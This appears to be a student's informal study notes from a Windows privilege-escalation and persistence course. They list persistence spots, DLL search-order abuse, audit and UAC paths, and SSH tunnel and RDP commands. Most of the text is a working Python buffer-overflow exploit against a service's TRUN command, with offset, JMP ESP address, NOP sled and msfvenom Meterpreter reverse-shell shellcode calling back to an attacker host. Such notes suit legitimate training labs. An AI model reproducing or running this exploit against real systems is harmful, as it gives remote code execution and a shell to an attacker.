https://sec.cybbh.io/-/public/-/jobs/842473/artifacts/slides/09-windows-priv-persist-cover.html

Scheduled Tasks -> Trigger
Serviers -> Startup

           (Boot)
Registry -> HKLM ->
            HKCU ->
           (Log On)

                                            (not in order)
DLL Search Order -  The directory the the Application was run from
                    The current directory (where it was run)
                    The directory specified in the C+ function GetWindowsDirectory()
                    The directory specified in in the C+ function GetSystemDirectory()
                    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs                 
  Some Programs will run without DLL's, we abuse that.

UAC Settings - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

auditpol /get /category:* | findstr /i "success failure" (shows what being audited for success and failures) (In order to run command need admin)

Event Logging - C:\Windows\System32\config
pa

#from Op station
ssh student@<JMP_IP> -L RHP:10.10.28.45:3389
#from Op station
xfreerdp /u:student /v:localhost:RHP /dynamic-resolution +clipboard
=========================================
#!/usr/bin/python2.7
  
  import socket
  
  '''
  msfvenom -p windows/meterpreter/reverse_tcp lhost=10.50.X.X lport=4444 -b "\x00" -f python
  '''
  
  
  buf = "TRUN /.:/" #Exploit
  buf += "A" * 2003 #Buffer Offset
  buf += "\xa0\x12\x50\x62"  #JMP ESP
  buf += "\x90" * 15 #NOP SLED
  buf += b"\xd9\xe5\xba\x92\x53\x39\x9b\xd9\x74\x24\xf4\x5e"
  buf += b"\x29\xc9\xb1\x59\x31\x56\x19\x83\xee\xfc\x03\x56"
  buf += b"\x15\x70\xa6\xc5\x73\xfb\x49\x36\x84\x63\x7b\xe4"
  buf += b"\xe0\xe8\x29\x38\x60\x0b\x46\x6a\x7e\x58\x0b\x9f"
  buf += b"\xf5\x2c\x84\xae\xf6\xdf\x63\x9a\x2e\xee\x4b\xb7"
  buf += b"\x13\x71\x30\xca\x47\x51\x09\x05\x9a\x90\x4e\xd3"
  buf += b"\xd0\x7d\x02\xb3\x91\xd3\xb3\xb0\xe4\xef\xb2\x16"
  buf += b"\x63\x4f\xcd\x13\xb4\x3b\x61\x1d\xe5\x48\x21\x3d"
  buf += b"\x8e\x06\xca\x3c\x43\xc6\x6f\xf7\x17\xda\x5e\xf7"
  buf += b"\x91\xa9\x95\x8c\x23\x7b\xe4\x52\x8f\x42\xc8\x5e"
  buf += b"\xd1\x83\xef\x80\xa4\xff\x13\x3c\xbf\xc4\x6e\x9a"
  buf += b"\x4a\xda\xc9\x69\xec\x3e\xeb\xbe\x6b\xb5\xe7\x0b"
  buf += b"\xff\x91\xeb\x8a\x2c\xaa\x10\x06\xd3\x7c\x91\x5c"
  buf += b"\xf0\x58\xf9\x07\x99\xf9\xa7\xe6\xa6\x19\x0f\x56"
  buf += b"\x03\x52\xa2\x81\x33\x9b\x3c\xae\x69\x0b\xf0\x63"
  buf += b"\x92\xcb\x9e\xf4\xe1\xf9\x01\xaf\x6d\xb1\xca\x69"
  buf += b"\x69\xc0\xdd\x89\xa5\x6a\x8d\x77\x46\x8a\x87\xb3"
  buf += b"\x12\xda\xbf\x12\x1b\xb1\x3f\x9a\xce\x2f\x4a\x0c"
  buf += b"\xfb\x9d\x60\x61\x93\xe3\x74\x68\x38\x6a\x92\xda"
  buf += b"\x90\x3c\x0b\x9b\x40\xfc\xfb\x73\x8b\xf3\x24\x63"
  buf += b"\xb4\xde\x4c\x0e\x5b\xb6\x25\xa7\xc2\x93\xbe\x56"
  buf += b"\x0a\x0e\xbb\x59\x80\xba\x3b\x17\x61\xcf\x2f\x40"
  buf += b"\x16\x2f\xb0\x91\xb3\x2f\xda\x95\x15\x78\x72\x94"
  buf += b"\x40\x4e\xdd\x67\xa7\xcd\x1a\x97\x36\xe7\x51\xae"
  buf += b"\xac\x47\x0e\xcf\x20\x47\xce\x99\x2a\x47\xa6\x7d"
  buf += b"\x0f\x14\xd3\x81\x9a\x09\x48\x14\x25\x7b\x3c\xbf"
  buf += b"\x4d\x81\x1b\xf7\xd1\x7a\x4e\x8b\x16\x84\x0c\xa4"
  buf += b"\xbe\xec\xee\xf4\x3e\xec\x84\xf4\x6e\x84\x53\xda"
  buf += b"\x81\x64\x9b\xf1\xc9\xec\x16\x94\xb8\x8d\x27\xbd"
  buf += b"\x1d\x13\x27\x32\x86\xa4\x52\x3b\x39\x45\xa3\x55"
  buf += b"\x5e\x46\xa3\x59\x60\x7b\x75\x60\x16\xba\x45\xd7"
  buf += b"\x29\x89\xe8\x7e\xa0\xf1\xbf\x81\xe1"
  
  s = socket.socket (socket.AF_INET, socket.SOCK_STREAM) # Creates IPv4 socket
  
  s.connect(("0.0.0.0",41211))    #IP and port to connect to
  print s.recv(1024)   #print response
  s.send(buf)       #sends the variable buf
  print s.recv(1024)   #print response
  s.close()         #close the connection
==================================================================
